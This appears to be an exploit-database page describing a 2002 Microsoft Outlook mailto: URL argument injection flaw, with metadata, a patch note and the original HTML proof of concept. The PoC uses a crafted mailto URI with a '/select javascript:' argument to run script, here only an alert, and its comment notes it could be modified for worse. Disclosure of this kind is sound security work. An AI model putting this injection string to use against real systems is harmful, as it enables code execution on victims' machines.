header-logo
Suggest Exploit
vendor:
Outlook
by:
shaun2k2
7.5
CVSS
HIGH
Code Injection
94
CWE
Product Name: Outlook
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Microsoft Outlook mailto: URL Argument Injection

Microsoft Outlook is prone to a vulnerability that may permit execution of arbitrary code on client systems. This issue is exposed through Outlook, but will reportedly cause Internet Explorer to load malicious content in the Local Zone. This issue will permit a remote attacker to influence how Outlook invoked via mailto URIs, allowing for execution of malicious scripting in the Local Zone through an attacker-specified Outlook profile parameter.

Mitigation:

Microsoft has released a patch to address this issue. Users are advised to apply the appropriate patch.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9827/info

Microsoft Outlook is prone to a vulnerability that may permit execution of arbitrary code on client systems. This issue is exposed through Outlook, but will reportedly cause Internet Explorer to load malicious content in the Local Zone.

This is related to how mailto URIs are handled by the software and may be exploited from a malicious web page or through HTML e-mail. This issue will permit a remote attacker to influence how Outlook invoked via mailto URIs, allowing for execution of malicious scripting in the Local Zone through an attacker-specified Outlook profile parameter.

** It was initially reported that exploitation of this issue will depend on the Outlook Today page being the default folder homepage. Additional details have been made available to indicate that in situations where this is not the default page, it is possible to use two mailto URIs to exploit the issue. The first URI would display the Outlook Today view and the second would include an embedded JavaScript URI.


<!-- Outlook mailto: URL argument injection
proof-of-concept exploit,
     by shaun2k2.  The exploit can be easily modified
to execute more
     malicious things.
-->

<html>
<body>
<!-- This is the exploit string. -->
<img src="mailto:aa" /select
javascript:alert('vulnerable')">
</body>
</html>

Navigation

Suggest Exploit

Services By CQR